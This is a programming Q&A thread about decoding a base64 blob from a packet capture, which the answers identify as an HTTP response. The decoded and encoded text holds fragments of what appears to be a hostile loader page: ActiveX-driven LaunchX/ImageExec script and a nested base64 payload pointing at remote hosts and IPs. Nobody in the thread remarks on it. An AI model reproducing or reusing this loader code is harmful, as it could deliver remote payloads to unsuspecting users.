# How is the blob of text encoded? Base64? Something else?

Tags: encoding, base64, decoding

I am having a string like this H0TCxoL9HSXXwlwXgBJAAAaiAAACBAW0AQMDAAEBBAIA what format is this? Below are some more strings. I thought as base64 but when i decode that i get strings like D????&??_?P@

```
H0TCxoL9HSbXwl+NUBBAAHISAABIVFRQLzEuMSAyMDAgT0sNCkRhdGU6IE1vbiwgMjEgSnVuIDIwMTAgMDk6NTI6NTMgR01UDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNi4wDQpQM1A6IENQPSJBTEwgQ1VSYSBBRE1hIERFVmEgVEFJYSBPVVIgQlVTIElORCBQSFkgT05MIFVOSSBQVVIgRklOIENPTSBOQVYgSU5UIERFTSBDTlQgU1RBIFBPTCBIRUEgUFJFIExPQyBPVEMiDQpYLVBvd2VyZWQtQnk6H0TCxoL9Hz7Xwl+NUBBAAFJ7AAAibm8tY2FjaGUiPiA8SFRNTD48Ym9keSBvbmxvYWQ9IndpbmRvdy5BWC5FeGVjKCdjdHl6Z0hsaWVUMkJqY254ZVBlM0p6M21ycjgzSlI0UmEwSVg3SXQyRFpaaGl4U2laNnJBaVZuU3JqVmQ4TDZrNXNQKEh6SFJ6TUJIRW5jcChic0Jqem9QcGx5aEJ1KHE2ajV1eG1nTVlWbDJTYTg1Y3B1cCluRXBNbUNxT0hiQUwpNlhvZGt6YUhyKGdCcHdram5IZFBSKVUzOEJTH0TCxoL9IVbXwl+NUBBAAOpdAAB4dC9qYXZhc2NyaXB0Jz52YXIgYjY0PSdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvPSc7U3RyaW5nLnByb3RvdHlwZS5BQT1mdW5jdGlvbigpe3ZhciBvMSxvMixvMyxoMSxoMixoMyxoNCxiaXRzLGQ9W10scGxhaW4sY29kZWQ7Y29kZWQ9dGhpcztmb3IodmFyIGM9MDtjPGNvZGVkLmxlbmd0H0TCxoL9I27Xwl+NUBBAAI+3AABDaGFyQ29kZShvMSk7fXBsYWluPWQuam9pbignJyk7cmV0dXJuIHBsYWluO307d2luZG93LkxhdW5jaFg9ZnVuY3Rpb24oXzEsXzIsXzMsXzQsXzUsXzApe3RoaXMuXzA9XzA7dGhpcy5fMT1fMTt0aGlzLl8yPV8yO3RoaXMuXzM9XzM7dGhpcy5fND1fNDt0aGlzLl81PV81O3RoaXMuXzY9bnVsbDt0aGlzLl83PW51bGw7dGhpcy5fOD1udWxsO3RoaXMuXzk9ZmFsH0TCxoL9JYbXwl+NUBBAAA42AABoaXMuXzIsdGhpcy5fMyx0aGlzLl80KTtkb2N1bWVudC53cml0ZSgnJyk7fTt3aW5kb3cuTGF1bmNoWC5wcm90b3R5cGUuRXhlYz1mdW5jdGlvbihfNyxfOCl7aWYodGhpcy5fOSl7dGhpcy5SdW4oKTtyZXR1cm47fXRoaXMuXzc9Xzc7dGhpcy5fOD1fODt0aGlzLl85PXRydWU7dGhpcy5SdW4oKTt9O3dpbmRvdy5MYXVuY2hYLnByb3RvdHlwZS5JbWFnZUV4ZWM9H0TCxoL9J57Xwl+NUBBAAMwRAAAuTGF1bmNoWC5wcm90b3R5cGUuX0cxPWZ1bmN0aW9uKCl7dGhpcy5fNj1kb2N1bWVudC5nZXRFbGVtZW50QnlJZCh0aGlzLl81KTt9O3dpbmRvdy5MYXVuY2hYLnByb3RvdHlwZS5Jbml0PWZ1bmN0aW9uKCl7dGhpcy5fRzEoKTt2YXIgZWw9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnRElWJyk7dmFyIGE9dGhpcy5fMC5BQSgpO2VsLmlubmVySFRNTD1hO307d2luH0TCxoL9KbbXwl+NUBBAAMopAABhRDBuTVNjZ2FHVnBaMmgwUFNjeEp5QnZibXh2WVdROUoycGhkbUZ6WTNKcGNIUTZkMmx1Wkc5M0xrRllMa2x0WVdkbFJYaGxZeWdpYUhSMGNEb3ZMMlJ1Ykc5allXd3VibUZ0Wld0eUxtTnZiVG80T0M5bllXMWxjR2xoZWk5MlpYSnphVzl1TG1GemNDSXBKejQ4YVcxbklITnlZeUE5SUNkb2RIUndPaTh2TlRndU1qSXhMak0wTGpJeE1UbzRPQzluWVcxbGNHbGhlH0TCxoL9K87Xwl+NUBBAAJkHAABNelF1TWpBME9qZzRMMmRoYldWd2FXRjZMM1psY25OcGIyNHVZWE53SWlrblBqeHBiV2NnYzNKaklEMGdKMmgwZEhBNkx5ODNNaTR6TkM0eU5ESXVNakk0T2pnNEwyZGhiV1Z3YVdGNkwyTm9heTVuYVdZbklIZHBaSFJvUFNjeEp5Qm9aV2xuYUhROUp6RW5JRzl1Ykc5aFpEMG5hbUYyWVhOamNtbHdkRHAzYVc1a2IzY3VRVmd1U1cxaFoyVkZlR1ZqS0NKb2RIUndPH0TCxoL9LebXwl+NUBhAABVAAABZWG92WTJockxtZHBaaWNnZDJsa2RHZzlKekVuSUdobGFXZG9kRDBuTVNjZ2IyNXNiMkZrUFNkcVlYWmhjMk55YVhCME9uZHBibVJ2ZHk1QldDNUpiV0ZuWlVWNFpXTW9JbWgwZEhBNkx5OHlNVEV1T0M0eU1UQXVNVGcyT2pnNEwyZGhiV1Z3YVdGNkwzWmxjbk5wYjI0dVlYTndJaWtuUGc9PScpOyB3aW5kb3cuQVguSW5pdCgpOzwvc2NyaXB0PjwvYm9keT48L0hUH0TCxoL9LrbXwl+NUBFAADJm
```

Comment: I could be anything. Maybe someone typed random characters? I mean, one might be able to say for a hash with which hash function it was created but encryption?

Comment: **Encryption != encoding**. This is important. You phrased and tagged your question wrongly. To find out what kind of encoding it is, is much easier than finding out what possible encryption scheme was used. As you can see, it led to misunderstandings from my part.

Comment: By the way, where did you get this data? Is it a packet sniffer dump?

Comment: Yes, i am writing a network monitor tool in C#

Answer (score 6, accepted):

Base64

I've run a decoder on it (the whole lot) and this is the result:

```
D�Ƃ�&��_�P@rHTTP/1.1 200 OK
Date: Mon, 21 Jun 2010 09:52:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC"
X-Powered-By:D�Ƃ�>��_�P@R{"no-cache"> <HTML><body onload="window.AX.Exec('ctyzgHlieT2BjcnxePe3Jz3mrr83JR4Ra0IX7It2DZZhixSiZ6rAiVnSrjVd8L6k5sP(HzHRzMBHEncp(bsBjzoPplyhBu(q6j5uxmgMYVl2Sa85cpup)nEpMmCqOHbAL)6XodkzaHr(gBpwkjnHdPR)U38BSD�Ƃ�!V��_�P@�]xt/javascript'>var b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';String.prototype.AA=function(){var o1,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;coded=this;for(var c=0;c<coded.lengtD�Ƃ�#n��_�P@��CharCode(o1);}plain=d.join('');return plain;};window.LaunchX=function(_1,_2,_3,_4,_5,_0){this._0=_0;this._1=_1;this._2=_2;this._3=_3;this._4=_4;this._5=_5;this._6=null;this._7=null;this._8=null;this._9=falD�Ƃ�%���_�P@6his._2,this._3,this._4);document.write('');};window.LaunchX.prototype.Exec=function(_7,_8){if(this._9){this.Run();return;}this._7=_7;this._8=_8;this._9=true;this.Run();};window.LaunchX.prototype.ImageExec=D�Ƃ�'���_�P@�.LaunchX.prototype._G1=function(){this._6=document.getElementById(this._5);};window.LaunchX.prototype.Init=function(){this._G1();var el=document.createElement('DIV');var a=this._0.AA();el.innerHTML=a;};winD�Ƃ�)���_�P@�)aD0nMScgaGVpZ2h0PScxJyBvbmxvYWQ9J2phdmFzY3JpcHQ6d2luZG93LkFYLkltYWdlRXhlYygiaHR0cDovL2RubG9jYWwubmFtZWtyLmNvbTo4OC9nYW1lcGlhei92ZXJzaW9uLmFzcCIpJz48aW1nIHNyYyA9ICdodHRwOi8vNTguMjIxLjM0LjIxMTo4OC9nYW1lcGlheD�Ƃ�+���_�P@�MzQuMjA0Ojg4L2dhbWVwaWF6L3ZlcnNpb24uYXNwIiknPjxpbWcgc3JjID0gJ2h0dHA6Ly83Mi4zNC4yNDIuMjI4Ojg4L2dhbWVwaWF6L2Noay5naWYnIHdpZHRoPScxJyBoZWlnaHQ9JzEnIG9ubG9hZD0namF2YXNjcmlwdDp3aW5kb3cuQVguSW1hZ2VFeGVjKCJodHRwOD�Ƃ�-���_�P@@YXovY2hrLmdpZicgd2lkdGg9JzEnIGhlaWdodD0nMScgb25sb2FkPSdqYXZhc2NyaXB0OndpbmRvdy5BWC5JbWFnZUV4ZWMoImh0dHA6Ly8yMTEuOC4yMTAuMTg2Ojg4L2dhbWVwaWF6L3ZlcnNpb24uYXNwIiknPg=='); window.AX.Init();</script></body></HTD�Ƃ�.���_�P@2f
```

This is part of a HTTP response, I'm guessing the gibrige is most likely due to a charset or you've pasted so much of it only. What you're getting is the result of decoding the first few lines only.

Link to decoding tool: http://www.opinionatedgeek.com/dotnet/tools/base64decode/

Comment: that's not garbage, that's IP and TCP headers

Comment: Please it is **not** *decryption*. It is *decoding*. This is a very important difference and can lead to misunderstandings.

Comment: @Felix Kling typo, fixed. Thanks for the heads up :)

Answer (score 7):

It may easily be anything, but since it contains mixed-case letters and numbers and few symbols, my guess is for [base64](http://en.wikipedia.org/wiki/Base64).

---

#### Addendum

Yes, it is definitely base64; it seems some kind of HTTP request, but it contains some strange characters, I don't know if it's garbage or binary data with some meaning.

Comment: @Saravanan I M: So what? Maybe it is binary data. One cannot tell if one does not know where it comes from. Btw. encoding != encryption.

Comment: Yep with some JavaScript in it

Answer (score 4):

This is definitely base64, decoding the first line gives you meaningful data, the beginning of HTTP packet dump.

```
[some header data here]
HTTP/1.1 200 OK
Date: Mon, 21 Jun 2010
```